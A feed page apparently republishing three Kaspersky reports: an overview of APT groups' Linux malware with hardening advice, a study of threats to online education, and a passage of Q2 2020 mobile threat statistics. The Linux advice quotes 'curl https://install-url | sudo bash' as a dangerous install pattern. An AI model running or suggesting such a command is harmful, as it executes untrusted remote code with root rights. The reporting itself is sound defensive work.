Kaspersky

Subscribe to Kaspersky hírcsatorna Kaspersky
Frissítve: 8 perc 54 másodperc
2020. szeptember 10.

An overview of targeted attacks and APTs on Linux

Perhaps unsurprisingly, a lot has been written about targeted attacks on Windows systems. Windows is, due to its popularity, the platform for which we discover most APT attack tools. At the same time, there’s a widely held opinion that Linux is a secure-by-default operating system that isn’t susceptible to malicious code. It’s certainly true that Linux hasn’t faced the deluge of viruses, worms and Trojans faced by those running Windows systems over the years. However, there is certainly malware for Linux – including PHP backdoors, rootkits and exploit code. Moreover, numbers can be misleading. The strategic importance of servers running Linux makes them an attractive target for attackers of all kinds. If an attacker is able to compromise a server running Linux, they not only gain access to data stored on the server but can also target endpoints connected to it running Windows or macOS – for example, through a drive-by download. Furthermore, Linux computers are more likely to be left unprotected, so that such a compromise might well go unnoticed. When the Heartbleed and Shellshock vulnerabilities were first reported in 2014, two major concerns were that compromised Linux servers could become an attacker’s gateway into a corporate network and could give an attacker access to sensitive corporate data.

The Global Research and Analysis Team (GReAT) at Kaspersky publishes regular summaries of advanced persistent threat (APT) activity, based on the threat intelligence research discussed in greater detail in our private APT reports. In this report, we focus on the targeting of Linux resources by APT threat actors.

Readers who would like to learn more about our intelligence reports or request more information on a specific report are encouraged to contact intelreports@kaspersky.com.

Barium

We first wrote about the Winnti APT group (aka APT41 or Barium) in 2013, when they were targeting mostly gaming companies for direct financial profit. Meanwhile, they grew their operations, developed tons of new tools and went for much more complex targets. MESSAGETAP is Linux malware used by this group to selectively intercept SMS messages from the infrastructure of telecoms operators. According to FireEye, the group deployed this malware on SMS gateway systems as part of its operations to infiltrate ISPs and telecoms companies in order to build a surveillance grid.

Recently, we discovered another suspected Barium/APT41 tool, written in the programming language Go (also known as Golang) that implements a dynamic, C2-controlled packet corruption/network attack tool for Linux machines. Although it’s not 100% clear if this is a tool developed for system administration tasks or if it is also part of the APT41 toolset, the fact that the functionality it offers can also be achieved through other system management tools suggests that its purpose may not be legitimate. Also, its name on disk is rather generic and is unrelated to its functionality, again suggesting that it is potentially a covert tool used for carrying out certain types of destructive attacks. More details about this tool can be found in our private report “Suspected Barium network control tool in GO for Linux”.

Cloud Snooper

In February 2020, Sophos published a report describing a set of malicious tools it attributes to a previously unknown threat actor called Cloud Snooper. The centerpiece is a server-oriented Linux kernel rootkit that hooks netfilter traffic control functions in order to enable firewall-traversing covert C2 (command-and-control) communications. We analyzed and described the rootkit’s userland companion backdoor, dubbed ‘Snoopy’, and were able to design detection and scanning methods to identify the rootkit at scale. We also discovered more samples, as well as targeted servers in Asia. We believe that this evolved toolset might have been in development since at least 2016.

DarkHotel

DarkHotel is one threat actor that has targeted Linux systems to use as part of its supporting infrastructure. For example, in November 2018, when we reported a DarkHotel campaign targeting diplomatic entities in the APAC region and Europe using the GreezeShell backdoor, we observed that some of the C2 servers were running Ubuntu Linux. The servers all had standard SSH and SMTP ports open; and, in addition, they all used Apache web server version 2.4.18.

Equation

We uncovered the Equation group in 2015. This is a highly sophisticated threat actor that has been engaged in multiple CNE (computer network exploitation) operations dating back to 2001, and perhaps as early as 1996. For many years this threat actor interacted or worked together with other powerful APT groups, for projects such as Stuxnet and Flame. The group has a powerful arsenal of implants. Among those we found were: ‘EQUATIONLASER’, ‘EQUATIONDRUG’, ‘DOUBLEFANTASY’, ‘TRIPLEFANTASY’, ‘FANNY’ and ‘GRAYFISH’. The innovations of the Equation group aren’t limited to the Windows platform. The group’s POSIX-compliant codebase allows for parallel developments on other platforms. In 2015, we came by the early-stage DOUBLEFANTASY malware for Linux. This implant collects system information and credentials and provides generic access to an infected computer. Given the role this module plays in the infection lifecycle, it would suggest the presence of analogous later-stage, more sophisticated implants, although we weren’t able to find any.

HackingTeam

HackingTeam was an Italian information technology company that developed and sold intrusion and so called “legal surveillance software” to governments, law enforcement agencies and businesses around the world. Unfortunately for them, they were hacked and suffered a data breach in 2015, at the hands of the activist known as Phineas Phisher. The subsequent leak of 400GB of stolen company data, including source code and customer information, allowed these tools to be acquired, adapted and used by threat actors around the world, such as DancingSalome (aka Callisto). The leaked tools included a zero-day exploit for Adobe Flash (CVE-2015-5119) as well as sophisticated platforms capable of providing remote access, keylogging, general information recording and exfiltration, and perhaps most notably, the ability to retrieve Skype audio and video frames directly from memory, bypassing stream encryption. The RCS (Remote Control System) malware (aka Galileo, Da Vinci, Korablin, Morcut and Crisis) includes multiple components, including desktop agents for Windows, macOS and perhaps unsurprisingly… Linux.

Lazarus

In late 2018, we discovered a previously unknown malicious framework that we named MATA internally. This framework was used to target commercial companies in Korea, India, Germany and Poland. While we weren’t able to find code overlaps with any other known actor, the Kaspersky Threat Attribution engine showed code similarities with Manuscrypt, complex malware used by Lazarus (aka Hidden Cobra). This framework, as with earlier malware developed by Lazarus, included a Windows backdoor. However, we also found a Linux variant that we believe was designed for networking devices.

In June 2020, we analyzed new macOS samples linked to Lazarus Operation AppleJeus and TangoDaiwbo campaigns, used in financial and espionage attacks. The samples had been uploaded to VirusTotal. The uploaded files also included a Linux malware variant that included similar functionality to the macOS TangoDaiwbo malware. These samples confirm a development that we had highlighted two years earlier – that the group was actively developing non-Windows malware.

Sofacy

Sofacy (aka APT28, Fancy Bear, STRONTIUM, Sednit and Tsar Team) is a highly active and prolific APT threat actor. From its high-volume zero-day deployment to its innovative, broad malware set, Sofacy is one of the top groups that we monitor. Among the tools in the group’s arsenal is SPLM (also known as CHOPSTICK and XAgent), a second-stage tool used selectively against targets around the world. Over the years, Sofacy has developed modules for several platforms, including, in 2016, modules for Linux, detected as ‘Fysbis’. The consistent artefacts seen over the years and across Windows, macOS, iOS and Linux suggests that the same developers, or a small core team, is modifying and maintaining the code.

The Dukes

The Dukes is a sophisticated threat actor that was first documented by us in 2013, but whose tools have been used in attacks dating back to 2008. The group is responsible for attacks against targets in Chechnya, Ukraine, Georgia, as well as western governments and NGOs, NATO and individuals – the group is thought to be behind the hack of the Democratic National Congress in 2016. The Dukes’ toolset includes a comprehensive set of malware implementing similar functionality but coded in several different programming languages. The group’s malware and campaigns include PinchDuke, GeminiDuke, CosmicDuke, MiniDuke, CozyDuke, OnionDuke, SeaDuke, HammerDuke and CloudDuke. At least one of these, SeaDuke, includes a Linux variant.

The Lamberts

The Lamberts is a highly sophisticated threat actor group which is known to possess a huge malware arsenal, including passive, network-driven backdoors, several generations of modular backdoors, harvesting tools and wipers for carrying out destructive attacks. We created a color scheme to distinguish the various tools and implants used against different victims around the world.

Lamberts discovery timeline

In 2017, we published an overview of the Lamberts family; and further updates (GoldLambert, SilverLambert, RedLambert, BrownLambert) are available to customers of our threat intelligence reports. The focus of the various Lamberts variants is definitely Windows. Nevertheless, signatures that we created for Green Lambert for Windows also triggered on a macOS variant of Green Lambert that was functionally similar to the Windows version. In addition, we also identified samples of the SilverLambert backdoor compiled for both Windows and Linux.

Tsunami backdoor

Tsunami (aka Kaiten) is a UNIX backdoor used by multiple threat actors since it was first seen in the wild in 2002. The source code was made public some years ago; and there are now more than 70 variants. The source code compiles smoothly on a wide range of embedded devices; and there are versions for ARM, MIPS, Sparc and Cisco 4500/PowerPC. Tsunami remains a threat for Linux-based routers, DVRs and the increasing number of IoT (internet of things) devices. In 2016, a variant of Tsunami was used in the Linux Mint hack, where an unknown threat actor compromised the Linux Mint distribution ISOs to include a backdoor. We also observed the use of the Tsunami backdoor to surgically target a number of cryptocurrency users on Linux.

Turla

Turla (aka Uroboros, Venomous Bear and Waterbug) is a prolific Russian-speaking group known for its covert exfiltration tactics such as the use of hijacked satellite connections, water-holing of government websites, covert channel backdoors, rootkits and deception tactics. This threat actor, like other APT groups, has made significant changes to its toolset over the years. Until 2014, every malware sample used by Turla that we had seen was designed for 32- or 64-bit versions of Windows.

Then in December 2014, we published our report on Penguin Turla, a Linux component in the Turla arsenal. This is a stealth backdoor that didn’t require elevated privileges, i.e. administrator or root rights. Even if someone with limited access to the system launches it, the backdoor can intercept incoming packets and run commands from the attackers on the system while maintaining stealth. It is also rather hard to uncover, so if it’s installed on a compromised server, it could sit there unnoticed for a long time. Further research on Penguin Turla revealed that its roots stretch back to the Moonlight Maze operation in the mid-1990s. In May this year, researchers from Leonardo published a report about Penguin_x64, a previously undocumented variant of the Penguin Turla Linux backdoor. Based on this report, we generated network probes that detect Penquin_x64 infected hosts at scale, allowing us to discover a couple dozen infected servers in Europe and the US, as recent as July 2020. We believe that, following public documentation of GNU/Linux tools, Turla may have been repurposing Penguin to conduct operations other than traditional intelligence gathering.

Two-Sail Junk

In January 2020, a watering hole was discovered that utilized a full remote iOS exploit chain to deploy a feature-rich implant named LightSpy. The site appears to have been designed to target users in Hong Kong, based on the content of the landing page. For the time being, until we can link the campaign to a known group, we have given the name Two-Sail Junk to the threat actor behind this implant. However, while our public report focused on the iOS implant, the project is broader than previously thought, supporting an Android implant, and probably supporting implants for Windows, Linux and MacOS.

WellMess

In March 2020, we began to actively track new C2 servers associated with malware commonly referred to as WellMess, indicating a potentially massive new wave of activity. This malware was initially documented by JPCERT in July 2018 and has been sporadically active since then. There were rumors that hint at a possible connection with CozyDuke (aka APT29), along with speculation that the current activity was focused on the healthcare industry, although we were unable to verify either claim. WellMess is a Remote Access Trojan, written in .NET and Go (Golang), cross-compiled to be compatible with both Windows and Linux.

WildNeutron

We first published about WildNeutron in 2015, together with our colleagues from Symantec, who call it Morpho or Butterfly. This group, which rose to prominence with their 2012-2013 attacks on Twitter, Microsoft, Apple and Facebook, are one of the most elusive, mysterious and dynamic we have seen. Their arsenal included many interesting and innovative tools, such as LSA backdoors or IIS plugins, coupled with both zero-day-based and physical deployment. Unsurprisingly, in several known attacks WildNeutron used a custom Linux backdoor as well.

Zebrocy

Zebrocy is custom malware that we have been tracking since 2015. The group using this malware started as a subset of Sofacy, but also has similarities and overlaps with other APT groups. The group has developed malware in several languages, including Delphi, AutoIT, .NET, C#, PowerShell and Go. Zebrocy has mainly targeted Central Asian government-related organizations, both in-country and in remote locations. The group makes extensive use of spear phishing to compromise Windows endpoints. However, its backdoors are configured to communicate directly with IP-assigned web server hosts over port 80; and the group seems to favor Linux for this part of its infrastructure – specifically, Apache 2.4.10 running on Debian Linux.

Recommendations for protecting Linux systems

One of the main reasons that Linux systems go unprotected is a false sense of security from using Linux instead of the far more popular (and more targeted) Windows. Nevertheless, we hope all the aforementioned points are convincing enough for you to start securing your Linux-based machines in a serious way.

The very first recommendation is to maintain a list of trusted sources of your software. Think about this in the same way as the recommended approach to Android or iOS apps – only installing applications from official repositories. In the Linux world we enjoy more freedom: for example, even if you are using Ubuntu, you’re not restricted only to Canonical’s own repository. Any .DEB file, or even application source code from GitHub, is at your service. But please choose these sources wisely. Don’t just blindly follow instructions like “Run this script from our server to install”; or “curl https://install-url | sudo bash” – which is a security nightmare.

Please also be mindful of the secure way to get applications from these trusted repositories. Your channels to update the apps have to be encrypted using HTTPS or SSH protocols. Besides your trust in software sources and its delivery channel, it’s critical for updates to arrive in a timely fashion. Most modern Linux flavors are able to do this for you, but a simple cron script would help you to stay more protected and to get all the patches as soon as they are released by developers.

The next thing we would recommend is checking network-related settings. With commands like “netstat -a” you could filter out all unnecessary opened ports on your host. Please avoid network applications you really don’t need or don’t use to minimize your network footprint. Also, it would be strongly recommended to properly set up the firewall from your Linux distributive, to filter traffic and store the host’s network activity. It’s also a very good idea not to go online directly, but through NAT.

To continue with the network-related security rules, we recommend protecting your locally stored SSH keys (used for your network services) using passwords at least. In more “paranoid” mode you could even store the keys on external protected storage, like tokens from any trusted vendor. On the server side of connections, nowadays it’s not that hard to set up multi-factor authentication for SSH sessions, like the messages to your phone or other mechanisms such as authenticator apps.

So far, our recommendations have covered software sources, application delivery channel, avoiding unnecessary network footprint and protection of encryption keys. One more idea we recommend for monitoring threats you couldn’t find at the filesystem level is to keep and analyze the network activity logs. You could install and use an out-of-band network tap to independently monitor and analyze the network communications of your Linux systems.

As part of your threat model, you need to consider the possibility that, despite all the aforementioned measures, attackers can compromise your protection. Think about the next protection step in terms of an attacker’s persistence in the system. They will probably make changes to be able to start their Trojan automatically after the system reboots. So, you need to regularly monitor the main configuration files as well as the integrity of system binaries, just in case of file viruses. The logs mentioned above for monitoring network communication, is fully applicable here: the Linux auditing system collects system calls and file access records. Additional daemons such as “osquery” can be used for the same task. . Any suspicious files, URLs, and IP addresses can be checked at Kaspersky Threat Intelligence Portal.

Physical security of devices is also important. It doesn’t matter how much attention you pay to network and system level hardening if your laptop ends up in an attacker’s hands and you haven’t taken steps to protect it from this attack vector. You should consider full disk encryption and safe boot mechanisms for physical security. A more spy-like approach would be to place tamper-evident security tape on your most critical hardware.

Dedicated solution with Linux security can simplify the protection task: web threat protection detects malicious and phishing websites; network threat protection detects network attacks in incoming traffic; behavior analysis detects malicious activity, while device control allows management of connected devices and access to them.

Our final recommendation relates to Docker. This is not a theoretical threat: infection of containers is a very real issue. Containerization doesn’t provide security by itself. Some containers are quite isolated from the host, but not all – network and file system interfaces exist in them and in most cases there are bridges between physical and containerized worlds.

Therefore, you can use security solution that allows to add security into development process. Kaspersky Hybrid Cloud Security includes integration with CI/CD platforms, such as Jenkins, through a script to scan Docker images for malicious elements at different stages.

To prevent supply-chain attacks, On-Access Scanning (OAS) and On-Demand Scanning (ODS) of containers, images, and local and remote repositories can be used. Namespace monitoring, flexible mask-based scan scope control and the ability to scan different layers of containers help to enforce secure development best practices.

We have broken down this list of recommendations into logical sections. Please bear in mind that, besides applying all the measures we have mentioned, you should also audit and check all the generated logs and any other messages regularly. Otherwise you could miss signs of intrusion. A final idea, for security enthusiasts, is to adopt active measures – to provide system penetration testing from time to time.

Summary of recommendations:
  • Maintain a list of trusted software sources, avoid using unencrypted update channels.
  • Do not run binaries and scripts from untrusted sources. A widely advertised way to install programs with commands like “curl https://install-url | sudo bash” is a security nightmare.
  • Make sure your update procedure is effective. Set up automatic security updates.
  • Spend time to set up your firewall properly: make sure it logs network activity, block all ports you don’t use, minimize your network footprint.
  • Use key-based SSH authentication, protect keys with passwords.
  • Use 2FA and store sensitive keys on external token devices (e.g. Yubikey).
  • Use an out-of-band network tap to independently monitor and analyze network communications of your Linux systems.
  • Maintain system executable file integrity. Review configuration file changes regularly.
  • Be prepared for insider/physical attacks: use full disk encryption, trusted/safe boot and put tamper-evident security tape on your critical hardware.
  • Audit the system, check logs for indicators of attacks.
  • Run penetration tests on your Linux setup.
  • Use a dedicated security solution for Linux with web and network protection, as well as features for DevOps protection.

 

2020. szeptember 4.

Digital Education: The cyberrisks of the online classroom

This past spring, as the COVID-19 pandemic took hold, online learning became the new norm as universities and classrooms around the world were forced to close their doors. By April 29, 2020, more than 1.2 billion children across 186 countries were impacted by school closures.

Shortly after schools began to transition to emergency remote learning, it became clear that many were not ready for the kind of full-time, digital education now needed. Not all students had the technology that was required, from laptops to a stable Internet connection, and parents and instructors in countries like the United States worried students would inevitably fall behind academically. What is more, many educational institutions did not have proper cybersecurity measures in place, putting online classrooms at increased risks of cyberattacks.

In fact, in June, Microsoft Security Intelligence reported that the education industry accounted for 61 percent of the 7.7 million malware encounters experienced by enterprises in the previous 30 days – more than any other sector.

Apart from malware, educational institutions were also at increased risk of data breaches and violations of student privacy. It was this spring that “Zoombombing” became part of the general lexicon after pranksters and ill-intentioned individuals began taking advantage of Zoom’s security weaknesses to break into private meetings. Among the victims were schools, with several reported incidents of online classrooms being interrupted by users making lewd comments or streaming pornography.

As fall approaches, digital learning will continue to be a necessity. In fact, half of all U.S. elementary and high school students will be entirely online. Even those that are reopening are deploying some kind of hybrid model, such as delivering large lectures online. What’s more, the threat of a second coronavirus wave still remains, meaning that future large-scale school closures are still a possibility.

With this in mind, Kaspersky researchers took a closer look at the cyber risks faced by schools and universities, so that educators can be prepared moving forward – and take the necessary precautions to stay secure.

Methodology

This report examines several different types of threats – phishing pages and emails related to online learning platforms and video conferencing applications, threats disguised under the names of these same applications, and distributed denial of service (DDoS) attacks affecting the education industry.

Various threats disguised under popular online learning platforms/video conferencing applications

For this part, we utilized results from the Kaspersky Security Network (KSN) – a system for processing anonymous data related to cybersecurity threats shared voluntarily from Kaspersky users – for two different periods: January-June 2019 and January-June 2020.

Using KSN, we searched for files bundled with various threats that contained the name of one of the following platforms/applications during one of the two periods above:

  • Moodle – the most popular learning management system (LMS) in the world. It is used by educators to build online courses, host classes and create activities.
  • Blackboard – another popular LMS. It provides a virtual learning environment where educators can build entirely digital courses or create additional activities to supplement in-person instruction.
  • Zoom – a highly popular online collaboration tool that provides free video conferencing capabilities. Many educators used Zoom to conduct online classes this past spring.
  • Google Classroom – a web service designed specifically for educators to host classes, generate assignments and track students’ progress.
  • Coursera – a popular online learning platform that hosts a variety of open online courses, certificates and even degree programs.
  • edX – a provider of open online courses available to users worldwide.
  • Google Meet – a video communication service similar to Zoom, which can be used to host meetings and online classes

The results display those (PC and mobile) users that encountered various threats disguised as the above platforms/applications from January-June 2019 and January-June 2020.

Distributed denial of service (DDoS) attacks

Kaspersky tracks DDoS (distributed denial of service) attacks using the Kaspersky DDoS Intelligence System. A part of Kaspersky DDoS Protection, the system intercepts and analyzes commands received by bots from C&C servers. The system is proactive, not reactive, meaning that it does not wait for the user device to get infected or a command to be executed. Each “unique target” represents a specific IP address that was attacked.

The following report displays the percentage of DDoS attacks that affected educational resources out of the total number of DDoS attacks registered by the Kaspersky DDoS Intelligence System for Q1 2019 and Q1 2020.

  • Our Key Findings. The number of DDoS attacks affecting educational resources grew by 550% in January 2020 when compared to January 2019.
  • For each month from February to June, the number of DDoS attacks that affected educational resources out of the total number of attacks was 350-500% greater in 2020 than in the corresponding month in 2019.
  • From January to June 2020, the total number of unique users that encountered various threats distributed under the guise of popular online learning platforms/video conferencing applications was 168,550 – a 20,455% increase when compared to the same period for 2019.
  • From January to June 2020, the platform most commonly used as a lure was Zoom, with 5% of the users that encountered various threats encountering them via files that contained the name Zoom. The second most common platform used as a lure was Moodle.
  • By far the most common threats encountered in 2020 were downloaders and adware, which were encountered in 98.77% of the total registered infection attempts. Various classes of trojans followed adware.
  • For threats distributed under the guise of popular platforms for conducting online classes in 2020, the greatest number of infection attempts registered came from Russia (21%) followed by Germany (21.25).
Phishing risks of online learning platforms / video conferencing applications

It is not unexpected that phishing, one of the oldest and most popular forms of cybercrime, would reach educational organizations. In fact, a host of phishing websites for popular platforms like Google Classroom and Zoom began to pop up following the switch to distance learning. From the end of April to mid-June, Check Point Research discovered that 2,449 domains related to Zoom had been registered, 32 of which were malicious and 320 were “suspicious”. Suspicious domains were also registered for Microsoft Teams and Google Meet. Users who land on these phishing pages are often tricked into clicking URLs that download malicious programs, or they might be tricked into inputting their login credentials, which would put these in the hands of the cybercriminals.

Fake login page for Zoom


Fake login page for Moodle

These criminals might not even be after access to your account. They can use your login credentials for various nefarious purposes: launching spam or phishing attacks, gaining access to your other accounts as people often reuse passwords, or collecting more personally identifiable information to be used in future attacks / attempts to steal funds.

Most universities also have their own platforms where students and faculty can login to access important resources and various academic services. This past spring, some attackers went so far as to target specific universities by creating phishing pages for their individual academic login pages.

Phishing page for Cornell University’s academic login page

Apart from fake web pages, cybercriminals sent out an increasing number of phishing emails related to these same platforms. These told users they had missed a meeting, a class had been canceled, or it was time to activate their accounts. Of course, if they opened the email and clicked on any links, they were at risk of downloading various threats.

Phishing email supposedly from Zoom urging the user to review a new video conferencing invitation

The cyberthreats of online learning platforms

A common way to distribute threats disguised as popular video meeting apps and online course platforms is by bundling threats as legitimate application installers.

There are several ways users can encounter these malicious installers. One way is through phishing websites designed to look like the legitimate platforms, as seen above. Those users who inadvertently end up on the wrong page are then exposed to malware or adware when they attempt to download what they believe is the genuine application. Another common way is through phishing emails disguised as special offers or notifications from the platform. If users click the links in the email, then they are at risk of downloading unwanted files.

From January to June 2019, the number of unique users that encountered various threats distributed via the platforms specified in the methodology section of this report was 820.

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

The number of unique users that encountered various threats disguised as popular online learning/video conferencing platforms, January – June 2019 (download)

The most popular lure was Moodle, with Blackboard and Zoom being the second most popular.

In 2020, however, the total number of users that encountered various threats disguised as popular online learning platforms jumped to 168,550, a 20,455% increase.

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

The number of unique users that encountered various threats disguised as popular online learning/video conferencing platforms, January – June 2020 (download)

Zoom was far and away the platform most frequently used as a lure, with 99.5% of users encountering various threats disguised under its name. This is not surprising given that Zoom became the go-to video conferencing platform. By February 2020, the platform had added more new users (2.22 million) than it had, in all of 2019 (1.99 million). As of April 30, the company claimed to have 300 million daily meeting participants. Given its immense popularity, it is only logical that it would be the preferred target for malicious actors. And, with millions of more users looking to download the application, the chances are high that at least some of these would come across fake installers or setup files.

A closer look at the 2020 threat landscape Types of threats encountered

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

Percent distribution of different types of threats disguised as popular online learning / video conferencing platforms encountered by users, January – June 2020 (download)

By far the most common threats distributed under the guise of legitimate video conferencing/online learning platforms were not-a-virus (99%). Not-a-virus files are typically divided into two categories: riskware and adware. Adware bombards users with unwanted ads, while riskware consists of various files – from browser bars and download managers to remote administration tools – that may carry out various actions on your computer without your consent.

About 1% of the infection attempts were various trojan families: malicious files that allow cybercriminals to do everything from deleting and blocking data to interrupting the performance of the computer. Some trojans encountered were password stealers, which are designed to steal your credentials, while others were droppers and downloaders, both of which can deliver further malicious programs on your device.

Other threats encountered were backdoors, which allow the attackers to take remote control over the device and perform any number of tasks; exploits, which take advantage of a vulnerability in an operating system or application to gain unauthorized access to/use of the latter; and DangerousObjects (non-specific malicious files).

A regional perspective

The five countries where the greatest number of infection attempts were registered are as follows:

Russia 70.94% Germany 21.25% Austria 1.44% Italy 1% Brazil 1%

For threats distributed under the guise of popular online learning / video conferencing platforms, the greatest number of attempts to infect users occurred in Russia (70.94%). The second greatest number came from Germany (21.25%). Both countries closed schools early in mid-March, making remote learning the only option for millions of teachers and students. In addition, video conferencing has become incredibly popular in Germany, with more than half of Germans regularly using it as a tool for work or school. Given the overall global popularity of Zoom, a significant portion of Germans most likely use this platform and – given that Zoom is by far the most popular platform used as a lure – encountered various threats as a result.

Educational resources hit by DDoS attacks

In April, a large Turkish university was forced entirely offline for 40 minutes after it was hit with a DDoS attack on the morning of exams. In June, a major university in the northeastern United States had its exams disrupted after a DDoS attack affected its online test platforms. These are just two examples of a larger trend that began after schools were forced to transition to emergency remote learning: the rise of DDoS attacks against the education sector.

In general, the total number of DDoS attacks increased globally by 80% for Q1 2020 when compared to Q1 2019. And a large portion of that increase can be attributed to the growing number of attacks against distance e-learning services.

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

Percent of the total number of DDoS attacks that affected educational resources: Q1 2019 vs Q1 2020 (download)

When compared to Q1 2019, the percentage of DDoS attacks affecting educational resources out of all DDoS attacks increased steadily for each month of Q2 2020 (with the exception of March). When looking at the total number of DDoS attacks that occurred between January and June 2020, the number of DDoS attacks affecting educational resources increased by at least 350% when compared to the corresponding month in 2019.

January: February: March: April: May: June: 550% 500% 350% 480% 357.14% 450%

The percent growth in the number of attacks on educational resources when compared to the same month in 2019

The more educational organizations rely on online resources to conduct their regular activities, the more of a target these networks become for cybercriminals looking to disrupt their operations.

Looking forward

Online learning is not a short-term response to a global pandemic. It is here to stay.

For one, the pandemic is not over. Many students are still studying virtually, at least part of the time, and some schools that decided to open have already decided to revert back to online classes only. The possibility of a second wave still looms, meaning educators have to be prepared for large-scale school closures in the future.

Even when the pandemic does end, most agree that online learning will not disappear altogether. A recent global survey by Pearson Education, an academic publishing company, found that nearly 90% of the 7,000 individuals surveyed expect online learning to continue to play a role at all education levels.

In fact, even before the pandemic, some universities had already developed blending curricula (a mix of offline experiences and online courses). More and more academic institutions are considering this as an option for future programs.

However, as long as online learning continues to grow in popularity, cybercriminals will attempt to exploit this fact for their own gain. That means educational organizations will continue to face a growing number of cyber risks – into this fall and beyond. Fortunately, engaging – and secure – online academic experiences are possible. Educational institutions just need to review their cybersecurity programs and adopt appropriate measures to better secure their online learning environments and resources.

The extended version of the report with security tips and additional materials from our partners: llya Zalessky, head of educational services at Yandex, Steven Furnell, professor of cyber security at the University of Nottingham, and Dr. Michael Littger, executive director of Deutschland sicher im Netz e.V, can be downloaded in PDF format.

2020. szeptember 3.

IT threat evolution Q2 2020. Mobile statistics

IT threat evolution Q2 2020. Review
IT threat evolution Q2 2020. PC statistics

These statistics are based on detection verdicts of Kaspersky products received from users who consented to provide statistical data.

Quarterly figures

According to Kaspersky Security Network, the second quarter saw:

  • 1,245,894 detected malicious installers, of which
    • 38,951 packages were related to mobile banking trojans
    • 3,805 packages proved to be mobile ransomware trojans
  • A total of 14,204,345 attacks on mobile devices were blocked
Quarterly highlights

In summing up the results of the second quarter, we will begin with the number of attacks that targeted mobile devices. In Q2 2019, we thwarted 15,137,884 attacks, but one year later, the number decreased insignificantly, to 14,204,345.

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

Number of attacks on mobile devices, Q1 2019 – Q2 2020 (download)

The absence of significant changes indicates that malware developers kept up their activities in the face of the coronavirus pandemic. At the same time, this shows that we are not going through an epidemic caused by any particular family or class of mobile threats. In other words, no one reached the level of Asacub in yet another quarter, which is good news.

Nevertheless, mobile security users encountered malicious files more often than adware or potentially unwanted apps.

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

Share of users who encountered various threat classes, Q2 2020 (download)

The number of users whose devices were found to contain adware is almost half the number of those whose devices were infected with various classes of malware. At the same time, adware is a clear leader by number of objects detected, both in the second quarter and in previous ones. What is peculiar about adware and applications with an integrated advertising module is that they are extremely difficult for the user to identify or remove. The applications themselves naturally give no warning that they will pop up half-screen or even full-screen advertisements, and telling which application is being displayed if the user did not run it is impossible without special tools.

This kind of applications can be found in the official Google Play store, too, and to our utter regret, some developers are not making a conscious effort to remove questionable advertisements from their products.

Further good news from Q2 2020 is a decrease in the number of devices that were found to contain stalkerware. Several possible explanations exist as to the cause of the significant decline that we have seen since Q4 2019 – we shall talk about these in the appropriate section.

Mobile threat statistics

In Q2 2020, Kaspersky detected 1,245,894 malicious installers, an increase of 93,232 over the previous quarter.

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

Number of detected malicious installation packages, Q2 2019 – Q2 2020 (download)

Over the past few quarters, we have seen an increase in the number of detected objects. Early 2018 saw a similar situation, when a great number of trojan droppers and potentially unwanted software was discovered.

Distribution of detected mobile apps by type

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

Distribution of newly detected mobile apps by type, Q1 and Q2 2020 (download)

Adware topped the list with 48%, a decrease of one percentage point from the previous quarter. The Ewind adware family (60.53% of all adware detected) was most common in Q2, followed by the FakeAdBlocker family with 13.14% and Inoco with 10.17%.

RiskTool-type potentially unwanted software ranked second among all detected threat classes. Its share was 20%, which is eight percentage points smaller than in Q1 2020 and 21 p.p. smaller than in Q2 2019.

Most of the detected RiskTool variants were SMSreg (44.6% of all detected potentially unwanted software), Resharer (12.63%) and Dnotua (11.94%) families.

SMS trojans hold third place among all detected threats with 7.59%. This threat class is believed to be dying out, as a mobile carrier account is a far less tempting target for criminals than a bank account, and both can be controlled from a mobile device. Agent (33.74%), Fakeinst (26.80%) and Opfake (26.33%) were the largest of the detected families of SMS trojans. All the three families were more common with Russian users, which is typical of the entire SMS trojan threat class. Users from Iran followed, far behind the Russians. The Opfake and Fakeinst families are also the leaders in the number of detections on end-user devices, each accounting for 23% of the total number of unique users attacked by SMS trojans. The Prizmes family (21%) and the Agent family (16%) followed in third and fourth place, respectively.

